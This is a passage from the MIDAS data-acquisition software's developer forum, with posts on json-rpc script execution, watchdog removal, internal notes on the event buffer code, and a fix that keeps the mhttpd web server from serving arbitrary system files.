>     frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
> alarm.c:310 [opt]
>     frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
>     frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
>     frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
>     frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
>     frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
> odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
>     frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
>     frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
>     frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
Entry  11 Feb 2019, Konstantin Olchanski, Info, json-rpc request for ODB /Script and /CustomScript. 
I added json-rpc requests for ODB /Script and /CustomScript (the first one shows up on the status page in the left hand side menu, the 
second one is "hidden", intended for use by custom pages).

To invoke the RPC method do this: (from mhttpd.js). Use parameter "customscript" instead of "script" to execute scripts from ODB 
/CustomScript.

One can identify the version of MIDAS that has this function implemented by the left hand side menu - the script links are placed by script 
buttons.

<pre>
function mhttpd_exec_script(name)
{
   //console.log("exec_script: " + name);
   var params = new Object;
   params.script = name;
   mjsonrpc_call("exec_script", params).then(function(rpc) {
      var status = rpc.result.status;
      if (status != 1) {
         dlgAlert("Exec script \"" + name + "\" status " + status);
      }
   }).catch(function(error) {
      mjsonrpc_error_alert(error);
   });
}
</pre>

The underlying code moved from mhttpd.cxx to the midas library as cm_exec_script(odb_path);

K.O.
Entry  14 Jan 2019, Becky Chislett, Bug Report, Custom script with new MIDAS 
I am having difficulty getting the custom scripts to work within the updated MIDAS. Before the 
update I was using something like : 

<input type=submit name=customscript value="test">

on my custom page to run a script under /CustomScript/test, however, with the update to 
MIDAS this is no longer working. I can't find any information about this functionality being 
updated in the latest version - has this changed? Or should it still work? 

Thanks,
Becky (g-2 DAQ)
    Reply  18 Jan 2019, Konstantin Olchanski, Bug Report, Custom script with new MIDAS 
> I am having difficulty getting the custom scripts to work within the updated MIDAS. Before the 
> update I was using something like : 
> 
> <input type=submit name=customscript value="test">
> 
> on my custom page to run a script under /CustomScript/test, however, with the update to 
> MIDAS this is no longer working. I can't find any information about this functionality being 
> updated in the latest version - has this changed? Or should it still work? 
> 
> Thanks,
> Becky (g-2 DAQ)

I do not see any messages about anybody changing this function. I hope it did not break by accident.

Right now I am working on the event buffer code, and did not plan to look at mhttpd, but it looks like
your problem is important and there is at least on more problem (but it has a work-around),
so I may look at it sooner than later...

K.O.
    Reply  22 Jan 2019, Stefan Ritt, Bug Report, Custom script with new MIDAS 
I just check that feature and found it's still working as expected. 

On trap I fell in was that a custom page needs the <input type=submit ...> to be imbedded into a pair of 

<form>
  ...
</form>

tags in order to work. Otherwise the browser will not execute the submit request. Has nothing to do with midas.

There was a small bug that after executing such a script, the URL was set to http://<host>/CS which is non-existent, 
so I fixed that to redirect to the page which called the script. Submitted to develop branch.
    Reply  24 Jan 2019, Konstantin Olchanski, Bug Report, Custom script with new MIDAS 
> <input type=submit name=customscript value="test">

Stefan is right, input-type-submit has to be inside a form. This type of rpc call is "old school". Today, we should 
have a json-rpc request to execute a custom script.

https://bitbucket.org/tmidas/midas/issues/163/need-json-rpc-method-to-execute-custom

K.O.
Entry  24 Jan 2019, Andreas Suter, Suggestion, json rpc API for history data 
For us it would be a handy feature if history data could be requested directly
from a custom page (time range or run based intervals) . Here I am not talking
about history plots but I am talking about recorded time series data. This way
we could easily generate useful graphs. For instance, if we measure the voltage
(constant current) while cooling, we could instantly get the resistance versus
temperature. Often we would like to 'correlate' recorded slow control data.

Is it already possible to extract history data the way suggested?
    Reply  24 Jan 2019, Konstantin Olchanski, Suggestion, json rpc API for history data 
> For us it would be a handy feature if history data could be requested directly
> from a custom page (time range or run based intervals) . Here I am not talking
> about history plots but I am talking about recorded time series data. This way
> we could easily generate useful graphs. For instance, if we measure the voltage
> (constant current) while cooling, we could instantly get the resistance versus
> temperature. Often we would like to 'correlate' recorded slow control data.
> 
> Is it already possible to extract history data the way suggested?

There are sundry hs_read() json rpc methods already implemented in preparation
of writing a javascript based history viewer (did not happen yet).

You can try to use them, they should work, but have not been tested extensively.

To find this stuff:
a) go to the mhttpd "help" page, open the "json rpc schema in text table format", look for the "hs_xxx" methods.
b) also from the "help" page, open "javascript examples- example.html", scroll down to "hs_get_active_events". Press the buttons, they should 
work, look at the source code to see how to call the rpc methods from your own page.

K.O.
Entry  10 Jan 2019, Konstantin Olchanski, Info, removal of cm_watchdog() 
cm_watchdog() has been removed from the latest midas sources. The watchdog functions performed by cm_watchdog() were 
moved to cm_yield() - those are - maintaining odb and event buffer "last active" timestamps and checking for and removing of 
timed-out clients.

Those who write midas programs should ensure that they call cm_yield() at least every 1-2 seconds (for the normal 10 second 
timeout settings). As always, before calling potentially time consuming operations, such as accessing slow responding 
hardware, one should increase or disable their watchdog timeout.

Those who write midas programs that do not use cm_yield() (i.e. the mserver), should call cm_periodic_tasks() instead with 
the same period as described for cm_yield() above.

Removal of cm_watchdog() solves many problems in the midas code base:
- firing of cm_watchdog() at random times in random places makes it difficult to do static code path analysis (call paths, etc) - 
this is needed to ensure correct multithread locking, etc
- ditto caused trouble with multithread locking when cm_watchdog() fires *inside* the pthread mutex locking library itself 
causing mutexes to be in an inconsistent state. This had to be kludged against in the ODB multithread locks - now this kludge 
can be removed.
- many non-midas codes in experiment frontends, etc was not expecting and did not correctly handle firing of the 
cm_watchdog() SIGALARM at random times (i.e. select() with timeout returned too soon, etc).
- today, UNIX signals are pretty obscure, best avoided. (i.e. interaction of signals and threads is not super will defined, etc).

commits up to (and including) plus merge of branch feature/remove_cm_watchdog
https://bitbucket.org/tmidas/midas/commits/9f1775d2fc75d0de0b9d4ef1abc7b2fb9bacca28

K.O.
    Reply  21 Jan 2019, Konstantin Olchanski, Info, removal of cm_watchdog() 
> cm_watchdog() has been removed from the latest midas sources
> Removal of cm_watchdog() solves many problems in the midas code base:

Removal of cm_watchdog() creates new problems:

a) the bm_send_event(BM_WAIT) and bm_receive_event(BM_WAIT) wait for free space and wait for new event do not update the timeouts (need to add a call 
to cm_periodic_tasks())
b) frontends that talk to slow external equipment now die unless they have their timeout adjusted to be longer than the longest equipment operation (they 
were already supposed to do this, but...)
c) mhttpd sometimes dies from from an odb timeout (with the default 10 sec timeout).

As one solution, we may bring an automatic cm_watchdog() back, but running from a thread instead of from SIGALARM.

K.O.
       Reply  24 Jan 2019, Konstantin Olchanski, Info, removal of cm_watchdog() 
> > cm_watchdog() has been removed from the latest midas sources
> > Removal of cm_watchdog() solves many problems in the midas code base:
> Removal of cm_watchdog() creates new problems:
> a) the bm_send_event(BM_WAIT) and bm_receive_event(BM_WAIT)
> b) frontends that talk to slow external equipment
> c) mhttpd sometimes dies from from an odb timeout (with the default 10 sec timeout).

The watchdog is back, in a "light" form. Added:

- cm_watchdog_thread() - runs every 2 seconds and updates the timestamps on ODB and all open event buffers (SYSMSG, SYSTEM, etc).
- cm_start_watchdog_thread() - added to mfe.c and mhttpd - so user frontends work the same as before cm_watchdog() removal
- cm_stop_watchdog_thread() - added to cm_disconnect_experiment() to avoid leaving the thread running after we closed odb and all event buffers.

As before, the watchdog only runs on locally attached midas programs. For programs attached remotely via the mserver, the mserver handles the watchdog functions.

This new light-weight watchdog thread only updates the timestamps, it does not check and remove dead clients, it does not check the alarms. These functions are now performed 
by cm_yield() and cm_periodic_tasks(). At least some program in an experiment should call them periodically. (normally, at least mlogger and mhttpd will do that).

Programs that accidentally relied on SIGALRM firing at 1Hz may still be affected - i.e. with the old cm_watchdog(), ::sleep(1000) will only sleep for 1 second (interrupted by 
SIGALARM), now it will sleep for the full 1000 seconds. Other syscalls, i.e. select(), are similarly affected.

For now, I think only mfe.c frontends and mhttpd need the watchdog thread. With luck all the other midas programs (mlogger, mdump, etc) will run fine without it.

K.O.
Entry  28 Dec 2018, Konstantin Olchanski, Info, note on the midas event buffer code, part 1 
In this technical note, I write down the workings of the midas event buffer code, the path 
that events travel from the frontend to the SYSTEM buffer to mlogger (and to disk).

The event buffer code has worked well in the past, but more recently we see a few 
problems. There is the event buffer shared memory corruption problem in the alpha-g 
detector daq. There is difficulties with GET_RECENT. There is timeouts in bm_receive_event 
RPC path in ROME. There is the 2Gbyte size limit on the event buffer size (limiting 
maximum event size to about 1Gbyte), due to the 32-bit-ness of the event buffer size code. 
In the day of 10gige networkwing (1Gbyte/sec) and >1Gbyte/sec storage arrays, 2Gbyte 
buffer size is just about sufficient. There is lack of multithread safety in the event buffer 
code. There is the lack of bm_receive_event() where I do not have to guess the maximum 
event size (making event truncation impossible).

I have been looking at the event buffer code for many years. It is extremely very well 
written,
but it is also probably the oldest code inside midas and it's age shows. Good code from 
1998 is just very hard to read and follow 20 years later in 2018. We no longer do "goto", we 
are not afraid of using malloc(), we declare variables as we are about to use them (instead 
of at the beginning of a function). The list goes on and on.

So after looking at this code for many years, I finally decided to bite the bullet and 
rewrite/modernize it. To my surprise the code took very well to this. I only had to rewrite 
the parts that use difficult to follow "goto" logic, the rest of the code almost refactored 
itself. I think this is a very good thing to happen as the basic logic remains the same and 
people already familiar with old code (Stefan, myself, etc) will find that while things moved 
around, the basic logic remained the same.

But first, we need to understand and write down how the event buffer code works.

to be continued,
K.O.
    Reply  28 Dec 2018, Konstantin Olchanski, Info, note on the midas event buffer code, part 2, bm_send_event() 
> In this technical note, I write down the workings of the midas event buffer code
> we need to understand and write down how the event buffer code works.

The data ingress part of the event buffer code is very simple, events are sent to the event buffer via the one 
function bm_send_event(). There is no other way to inject data into an event buffer.

bm_send_event() does this:
= if the write cache is active:
- the new event is written into the local write cache
- if the write cache is full, it is flushed into the event buffer via bm_flush_cache()
- if the new event does not fit into the write cache, the write cache is flushed and the event is written into the 
event buffer (preserving the event ordering).
= if the write cache is inactive, new events are written directly into the event buffer.
= to write an event into the event buffer:
- wait for free space via bm_wait_for_free_space()
- lock buffer semaphore
- copy data into buffer shared memory
- update write pointer
- unlock buffer semaphore
- notify all readers waiting for this event

bm_flush_cache() does this:
- wait for free space via bm_wait_for_free_space()
- lock buffer semaphore
- copy events from write cache to buffer shared memory
- at the same time keep track of readers that wait for these events
- update write pointer
- unlock buffer semaphore
- notify all readers waiting for previous cached events

bm_wait_for_free_space() does this:
= if buffer is full and sync_flag==BM_NO_WAIT
- return BM_ASYNC_RETURN immediately
- causing bm_send_event() to immediately return BM_ASYNC_RETURN without writing anything to the event 
buffer
= if buffer is full,
- sleep using ss_suspend(1000, MSG_BM), then check again
- there is no timeout, bm_wait_for_free_space() will wait forever

The most expensive operation when writing to the event buffer is the locking,
we must wait until all readers finish their reading and all other writers finish their writing
and unlock the buffer for us. (read on "lock fairness and starvation"). In general, the less
locking we do, the better.

To reduce lock contention the event buffer code has a write cache. In theory, when we write
a large number of small events, it is more efficient to "batch" them together, significantly
reducing the number of locking operations "per event". Even if the events are large, if there
is significant lock contention from multiple writers and multiple readers, batching the writes
is still a good idea. The downside of this is the cost of an extra memcpy(). instead of one memcpy() from
user buffer to the shared memory, we do 2 memcpy() - from user buffer to write cache, then from
write cache to the shared memory. Today's typical PC-type machines have very fast RAM,
so memcpy() is inexpensive. However embedded and low power machines (ARM SoCs, FPGA based SoCs,
etc) tend to have pretty slow memory, so extra memcpy() can be expensive.

The bottom line is that the write cache size should be tuned to the actual use case,
but in general it is less useful at low data rates (hardly any contention for the event buffer locks),
and more useful at high data rates especially with very small event sizes (high overhead from
locking on each event).

Right now the write cache is always enabled for mfe-based frontends:
bm_set_cache_size(..., 0, SERVER_CACHE_SIZE); // 100000 bytes
(perhaps the cache size should be made configurable via ODB /Eq/xxx/Common).

To ensure that events do not sit in the write cache for too long,
mfe-based frontends call bm_flush_cache() about once per second.
(see mfe.c, good luck!)

to be continued,
K.O.
       Reply  28 Dec 2018, Konstantin Olchanski, Info, note on the midas event buffer code, part 3, rpc_send_event() 
> In this technical note, I write down the workings of the midas event buffer code
> we need to understand and write down how the event buffer code works.
> bm_send_event() does this ...

When connecting to midas remotely via the mserver, bm_send_event() works as expected through
the MIDAS RPC (RPC_BM_SEND_EVENT).

MIDAS RPC does a lot of work encoding and decoding the data, so for extra efficiency,
mfe-based frontends, use rpc_send_event().

rpc_send_event() does this:
- if we are connected locally, call bm_send_event()
- if rpc_mode==0, an RPC_BM_SEND_EVENT request is constructed "by hand" and sent to the mserver, result is same as calling 
bm_send_event() but overhead is reduced because we avoid calling the generic rpc_call().
- if rpc_mode!=0, event data is sent to the mserver by writing it into the event tcp connection (_server_connection.event_sock).
- there is a small (8kbyte) cache for batching tcp writes, probably not useful for modern tcp implementation, but it makes 
rpc_send_event() non thread-safe.

rpc_send_event() is NOT thread safe.

mserver receives event data in rpc_server_receive():
- read the data from the event tcp connection (_server_acception[idx].event_sock) via recv_event_server()
- decode the buffer handle and call bm_send_event(BM_WAIT)
- this is done in a loop for a maximum of 500 msec or until there is no more data in the event tcp connection
- maximum event size that can be received is set by ODB /Experiment/MAX_EVENT_SIZE.

This data path is the most efficient way for sending data from a remote client into midas.

Limitations:
- rpc_send_event() is not thread safe because
a) it uses a small and probably unnecessary data cache and
b) the communication protocol requires 2 syscalls to send an event (1st syscall to send 2 bytes of buffer handle, 2nd syscall to send the 
event data).
- rpc_server_receive() cannot receive arbitrary large events because recv_event_server() does not know how to allocate memory (it does 
know the event size).
 
to be continued,
K.O.
          Reply  28 Dec 2018, Konstantin Olchanski, Info, note on the midas event buffer code, part 4, reading from event buffer 
> > In this technical note, I write down the workings of the midas event buffer code
> > we need to understand and write down how the event buffer code works.
> > bm_send_event() does this ...
> rpc_send_event() does this ...
> mserver rpc_server_receive() does this ...

There are two ways to read data from an event buffer.

The first way is to specify an event request without an event handler callback function and use bm_receive_event() to poll for new events.

The second way is to specify an even handler callback function and rely on midas internal event notifications
and polling to receive events via the callback function. The mlogger and mdump utilities use this method.

The third part to this involves delivering event notifications to remote midas clients connected via the mserver.
They cannot receive event buffer notifications - the UDP datagrams are sent on the localhost interface
and are received by the mserver which has to forward them to the remote client.

In addition, there is an event buffer read cache, which works similar to the write cache to reduce the number
of buffer lock operations and so reduce the locking overhead and the lock contention.

to be continued,
K.O.
             Reply  02 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 5, bm_read_buffer() 
> > > In this technical note, I write down the workings of the midas event buffer code
> > > we need to understand and write down how the event buffer code works.
> > > bm_send_event() does this ...
> > rpc_send_event() does this ...
> > mserver rpc_server_receive() does this ...
> 
> There are two ways to read data from an event buffer.
>
> The first way is to specify an event request without an event handler callback function and use bm_receive_event() to poll for new events.
> 
> The second way is to specify an even handler callback function and rely on midas internal event notifications
> and polling to receive events via the callback function. The mlogger and mdump utilities use this method.
> 

The two ways of reading events from the event buffer are/were implemented by bm_receive_event() and bm_push_event(). The code
in these two functions is/was identical (the best I can tell) except that the first one copied the event data into a user buffer,
while the second one invoked the user event request callback function via bm_dispatch_event().

In the new code, I have consolidated both functions into one, called bm_read_buffer().

bm_read_buffer() does this:
- if read cache is enabled:
- read events from read cache
- if read cache is empty, fill it from the event buffer shared memory via bm_fill_read_cache()
- if the next event in the event buffer shared memory does not fit into the read cache, filling of the read cache stops
- then events are read from the read cache until it is empty, then we fall through to:
- if the read cache is disabled or next event in the event buffer does not fit into the read cache,
- read the next event directly from the event buffer (at this point, the read cache is empty).

Through out this activity, all events from the event buffer shared memory that do not match any
event request are skipped. Only events that match an event request are copied into the read cache.

bm_dispatch_event() does this:
- calls some code for event defragmentation (I do not know if this code is used or if it works)
- loop over all event requests, for matching request, call the user event handler function (buffer handle, request id, event header, event data)
- if multiple requests match an event, the user event handler will be called multiple times (once per matching request).

Following functions are now available to the users to read the event buffer:
- bm_push_event(buffer name) - dispatch next event from the read cache or poll the event buffer for new events, fill the read cache and dispatch the next event (via 
bm_dispatch_event()).
- bm_check_buffers() - call bm_push_event() for all open buffers in a loop for about 1000 ms.
- bm_receive_event() - read the next event into the supplied buffer (buffer should be big enough to fit event of maximum size, see ODB /Experiment/MAX_EVENT_SIZE.
- bm_receive_event_alloc() - read the next event into an automatically allocated buffer of correct size to fit the event. this buffer should be free()ed after use.

This is it for the code internals that deal directly with the event data buffers shared memory.

Next to explore is the reading of events through the mserver, the polling of buffers in various programs and the communication between buffer readers and writers.

to be continued,
K.O.
                Reply  02 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 6, reading events through the mserver 
> > > > In this technical note, I write down the workings of the midas event buffer code
> > > > we need to understand and write down how the event buffer code works.
> > > > bm_send_event() does this ...
> > > rpc_send_event() does this ...
> > > mserver rpc_server_receive() does this ...
> bm_read_buffer() does this ...
> bm_dispatch_event() does this ...
> - bm_push_event(buffer name) ...
> - bm_check_buffers() - call bm_push_event() for all open buffers ...
> - bm_receive_event() ...
> - bm_receive_event_alloc() ...

There is only one path for midas programs (analyzers, mdumps, etc) connected remotely
through the mserver to receive event data - by using bm_receive_event(). Unlike the mfe
frontend where two paths are possible for sending data - bm_send_event() and rpc_send_event() -
there is no "rpc_recieve_event" alternate data path for receiving data.
Event data can only travel through the RPC_BM_RECEIVE_EVENT RPC call.

So how do the event request callbacks work in a remote-connected client?

a) cm_yield() always calls bm_poll_event() which loops over all requests, calls bm_receive_event() and bm_dispatch_event().
b) ss_suspend() calls rpc_client_dispatch() to receive an MSG_BM message from the mserver and call bm_poll_event(), then as above.

So new events can show up at the user event handler each time we call cm_yield() (poll bm_receive_event()) and
each time we call ss_suspend() (check for MSG_BM message from mserver).

This is how does the mserver generates the MSG_BM messages:
- cm_dispatch_ipc receives a "B" message (from the writer to the event buffer)
- calls bm_notify_client(buffer name) (instead of calling bm_push_event() for a normal direct-attached client)
- bm_notify_client() sends the MSG_BM message to the remote client, unless:
-- the remote client did not specify and event handler callbacks (pbuf->callback is false) (they poll for data)
-- previous MSG_BM message was sent less than 500 ms ago.

The best I understand, at the end, this scheme works like this:

- low frequency events (< 1/sec) will always generate an MSG_BM message and cause
the remote client to receive and dispatch this event almost immediately (as soon as they
do the next cm_yield() or ss_suspend().

- high frequency events (> 2/sec) will have the MSG_BM messages throttled by the 500 ms blank-off
in bm_notify_client() and will be processed almost exclusively by polling via cm_yield().

Additional gotchas.

a) polling for events via bm_receive_event() without BM_NO_WAIT will cause serious problems. Because
internally, bm_receive_event() does not have a timeout, it will wait for new data forever, stalling
the RPC_BM_RECEIVE_EVENT request. Normally, rpc_call(RPC_BM_RECEIVE_EVENT) will timeout,
but the bm_receive_event() function disables this timeout, so for the remotely connected client,
the rpc call will hang forever. This creates two problems:
a1) if this is a multithreaded client and from another thread, it tries to do another RPC call (i.e. access odb, etc), there will be a crash on waiting for the RPC mutex (timeout is 10 sec, see 
rpc_call(), in this case, rpc_timeout is zero)
a2) if a run stop is attempted, the RPC call from cm_transition() will timeout and cause this client to be killed. This is because while waiting for an RPC reply, we do not listen for and process 
incoming RPC requests. (waiting is done inside ss_socket_wait() through recv_tcp2() and ss_recv_net_command()).
aa) because of this, clients connected remotely should always call bm_receive_event() with BM_NO_WAIT.

All of the above applies only to clients connected remotely via the mserver.

to be continued,
K.O.
                   Reply  03 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 7, event buffer polling frequencies 
> > > > > In this technical note, I write down the workings of the midas event buffer code
> > > > > we need to understand and write down how the event buffer code works.
> > > > > bm_send_event() does this ...
> > > > rpc_send_event() does this ...
> > > > mserver rpc_server_receive() does this ...
> > bm_read_buffer() does this ...
> > bm_dispatch_event() does this ...
> > - bm_push_event(buffer name) ...
> > - bm_check_buffers() - call bm_push_event() for all open buffers ...
> > - bm_receive_event() ...
> > - bm_receive_event_alloc() ...
> remote client: cm_yield() -> bm_poll_event() -> bm_receive_event() -> bm_dispatch_event()
> remote client: ss_suspend() -> receive MSG_BM -> rpc_client_dispatch() -> bm_poll_event() -> ...
> mserver: cm_dispatch_ipc -> bm_notify_client() -> send MSG_BM

We now understand that cm_yield() polls the data buffers for new events, adding to buffer lock congestion. What is the
polling frequency in different programs:

mlogger, no run: 1000 ms cm_yield() split by firing of cm_watchdog() (average sleep time is 500ms), poll frequency 2 Hz
mlogger, when running at high data rate: most time is spent looping inside bm_check_buffers(), poll frequency is ~1 Hz
mdump: same thing, 1000 ms cm_yield() is split by cm_watchdog(), poll frequency is 2 Hz
odbedit: 100 ms cm_yield(), poll frequency is 10 Hz, normally it polls just the SYSMSG buffer.
mfe.c frontend: 100 ms cm_yield(), but it makes no event requests, so no polling of event buffers
mhttpd: 0 ms (!!!) cm_yield(), period 10 ms (there is a 10 ms ss_suspend() somewhere there), polls SYSMSG at crazy frequency of 100 Hz.
mserver: 5000 ms cm_yield() no polling for events

hmm... perhaps the logic of cm_yield() should be changed to only poll for new events once per second -
as for rare events we receive them through the "B" messages from the buffer writer, for high rate
messages we process them in a batch via the read cache and the loop in bm_check_buffer().

Next is to write down the communication between buffer writers and buffer readers.

to be continued,
K.O.
                      Reply  03 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 8, writer and reader communications 
> > > > > > In this technical note, I write down the workings of the midas event buffer code

Event buffer readers and writers need to communicate following information:

- writer to reader: when new events are written to the buffer, send a message to wakeup any readers that have matching requests
- reader to writer: when buffer is full and we are waiting for free space, readers need to send us a message after they free up some space

Writer to reader path:
writer - bm_send_event() -> bm_wake_up_client_locked() -> for all readers with matching requests -> if "read_wait" is set, send "B" message
reader - ... -> bm_read_buffer() -> bm_wait_for_more_events() -> set "read_wait" to TRUE -> ss_suspend(1000, MSG_BM) - wait for "B" message, also poll the 
buffer every 1000 msec -> when new event is received, clear "read_wait".

Reader to writer path:
writer - bm_send_event() -> bm_wait_for_free_space() -> set "write_wait" to the amount of free space requested -> ss_suspend(1000, MSG_BM) - wait for "B" 
message, also poll every 1000 msec -> clear "write_wait" to zero.
reader - ... -> bm_read_buffer() -> (also via bm_fill_read_cache() -> bm_wakeup_producers_locked() -> if we are a GET_ALL reader -> if buffer is 50% empty -> 
if write_wait < free_space -> send "B" message.

N.B.1. There is a fly in the ointment for the writer-to-reader path: a function called
bm_mark_read_waiting() is called from several places to set and clear the reader "read_wait" flag.
I think this causes several logic errors: "read_wait" is mistakenly set for buffers where we have
not requested anything; and "read_wait" is forcibly cleared when we are actually waiting
for a "B" message, with "read_wait" cleared, this message will not be sent. But because we  also
poll for new events (nominally every 1000 msec, with cm_watchdog() cutting it down to average 500 msec),
we will not see this fault unless we look carefully for any extra delays between sending and receiving events.

N.B.2. There is a mistake in bm_wakeup_producers(), it should not send "B" messages to clients with zero "write_wait". (fixed in the new code).

and that's all she wrote,
K.O.
                         Reply  10 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 8, writer and reader communications 
> > > > > > > In this technical note, I write down the workings of the midas event buffer code
> Event buffer readers and writers need to communicate following information:
> 
> N.B.1. There is a fly in the ointment for the writer-to-reader path: a function called
> bm_mark_read_waiting() is called from several places to set and clear the reader "read_wait" flag.
> I think this causes several logic errors...

bm_mark_read_waiting() is removed in the new code, it is unnecessary. This uncovered a number of problems
in the writer-to-reader communications, fixed in the new code:

- bm_poll_event() did not poll anything because internal flags were not set right
- reader "read_wait" now means "I am waiting for new data, please send me a notification "B" message".
- writer sends a notification "B" message and clears "read_wait" to stop sending more notifications until the reader asks for more data.
- for remote clients, there is interplay between the 500 ms sec blank-off in sending BM_MSG notifications from the mserver and the 1000 ms timeout in the loop of bm_poll_event(). Do not 
change one of them without thinking how it will affect the other one and how they interact.

K.O.
Entry  10 Jan 2018, Andreas Suter, Bug Report, mhttpd - custom page - RHEL/Fedora system.c.diff
Description of the problem (starting with 61be7a1):

When starting a new experiment, creating a fresh ODB and than adding the 
directory '/Custom', the mhttpd runs into a problem on RHEL/Fedora, but not on 
Ubuntu and macOS. When trying to open the ODB from within whatever browser I get 
the following error message in the midas message queque:

[mhttpd,ERROR] [mhttpd.cxx:563:rread,ERROR] Cannot read file '/root', read of 
4096 returned -1, errno 21 (Is a directory)

and in the browser I get a popup which tries to save a file called 'root'.

I track this down to the following: in mhttpd, interprete (line 18046) it is 
check if a custom page file exists (ss_file_exist) and if yes, it tries to 'load' 
it. Now, at this stage the variable dec_path contains '/root'.

Here now what goes wrong: ss_file_exist tries to open the given path, and if a 
valid file descriptor is returned it assumes the file exists. This is not 
perfectly correct since it also will get a valid file descriptor is path is an 
accessible directory!

Now for whatever reason, on RHEL/Fedora '/root' will return a valid file 
descriptor, but not on macOS and Ubuntu. Others I haven't tested. A possible fix 
would be to check explicitly if path is a directory and if yes return 0 in 
ss_file_exist (see attached diff).

Perhaps there is cleaner way to deal with this issue?! 
    Reply  11 Jan 2018, Konstantin Olchanski, Bug Report, mhttpd - custom page - RHEL/Fedora 
> [mhttpd,ERROR] [mhttpd.cxx:563:rread,ERROR] Cannot read file '/root', read of 
> 4096 returned -1, errno 21 (Is a directory)

On some linux systems, "/root" exists, it is a directory used as the home directory 
of user "root" (~root is /root; traditional UNIX has ~root as /).

open() of a directory succeeds on some UNIX systems, on some of them,
read() also works, but on other systems one is supposed
to use opendir() and readdir().

MacOS is of course a BSD system (not SysV like Solaris, not Linux), so things
are different yet again. I think MacOS does not have a /root.

In any case, IMO, mhttpd has no business serving the contents of /root,
or serving any files outside of the mhttpd user $HOME directory. (but also
should not serve files from ~user/.ssh, or any other "secret" files, good
luck making a complete axhuastive list of all secret files that should not be
served).

K.O.


> 
> and in the browser I get a popup which tries to save a file called 'root'.
> 
> I track this down to the following: in mhttpd, interprete (line 18046) it is 
> check if a custom page file exists (ss_file_exist) and if yes, it tries to 'load' 
> it. Now, at this stage the variable dec_path contains '/root'.
> 
> Here now what goes wrong: ss_file_exist tries to open the given path, and if a 
> valid file descriptor is returned it assumes the file exists. This is not 
> perfectly correct since it also will get a valid file descriptor is path is an 
> accessible directory!
> 
> Now for whatever reason, on RHEL/Fedora '/root' will return a valid file 
> descriptor, but not on macOS and Ubuntu. Others I haven't tested. A possible fix 
> would be to check explicitly if path is a directory and if yes return 0 in 
> ss_file_exist (see attached diff).
> 
> Perhaps there is cleaner way to deal with this issue?! 
       Reply  12 Jan 2018, Stefan Ritt, Bug Report, mhttpd - custom page - RHEL/Fedora 
> In any case, IMO, mhttpd has no business serving the contents of /root,
> or serving any files outside of the mhttpd user $HOME directory. (but also
> should not serve files from ~user/.ssh, or any other "secret" files, good
> luck making a complete axhuastive list of all secret files that should not be
> served).

I fully agree with Konstantin. mhttpd should only serve files under certain directories. One is the 
midas/resources directory, another is the one defined in the ODB under /Custom/Path. I plan to modify 
mhttpd to only serve these files (and also prevent tricks like putting "../../../" into the URL). This will then 
also fix Andreas' problem.

Stefan
       Reply  26 Dec 2018, Konstantin Olchanski, Bug Report, mhttpd - custom page - RHEL/Fedora 
> > [mhttpd,ERROR] [mhttpd.cxx:563:rread,ERROR] Cannot read file '/root', read of 
> > 4096 returned -1, errno 21 (Is a directory)
> 
> On some linux systems, "/root" exists, it is a directory used as the home directory 
> of user "root" (~root is /root; traditional UNIX has ~root as /).
> 

I just got burned by the same problem on MacOS. mhttpd odb editor cannot open ODB "/System" 
because on MacOS there is a subdirectory called "/System".

So the question is why did mhttpd suddenly started serving files from the main URL?

K.O.
    Reply  21 Dec 2018, Stefan Ritt, Bug Report, mhttpd - custom page - RHEL/Fedora 
I implemented that fix. Thank you to Andreas. Creating "Custom" directory from the web now does 
not have that problem any more.

Stefan
       Reply  26 Dec 2018, Konstantin Olchanski, Bug Report, mhttpd - custom page - RHEL/Fedora 
> I implemented that fix. Thank you to Andreas. Creating "Custom" directory from the web now does 
> not have that problem any more.

This fix also stops mhttpd from serving the /etc/passwd file.

BTW, "the fix" in mhttpd unconditionally creates /Custom/Path and sets it to the value of $MIDASSYS. This path 
seems to be prepended to all file paths, so this fix also breaks the normal use of /Custom/xxx that contain the full 
path name of the file to serve...

Looks like file serving in mhttpd got messed up and needs to be reviewed. I still strongly believe that mhttpd should 
be serve arbitrary files (only serve files explicitly listed in ODB) or as next best option, only serve files from 
subdirectories explicitly listed in ODB.

K.O.
          Reply  27 Dec 2018, Stefan Ritt, Bug Report, mhttpd - custom page - RHEL/Fedora 
> BTW, "the fix" in mhttpd unconditionally creates /Custom/Path and sets it to the value of $MIDASSYS. This path 
> seems to be prepended to all file paths, so this fix also breaks the normal use of /Custom/xxx that contain the full 
> path name of the file to serve...

I just set the /Custom/Path to $MIDASSYS to have something non-zero there. This is only a default which should be changed to the directory 
containing the actual custom pages. If it breaks existing code, just set it manually to an empty string, nothing prevents you from doing that.

> Looks like file serving in mhttpd got messed up and needs to be reviewed. I still strongly believe that mhttpd should 
> be serve arbitrary files (only serve files explicitly listed in ODB) or as next best option, only serve files from 
> subdirectories explicitly listed in ODB.

I'm thinking along the same lines, but figured out that this cannot be done easily. If people have access to the ODB, the can put the directory 
/etc/ into the ODB and again read that way /etc/passwd. We would have to explicitly hard-code some directories to exclude like /etc/ /var/ etc. 
but on macOS that might be different. We could put the list of directories into a physical file, which cannot be edited via the web interface. 

Stefan
             Reply  27 Dec 2018, Konstantin Olchanski, Bug Report, mhttpd - custom page - RHEL/Fedora 
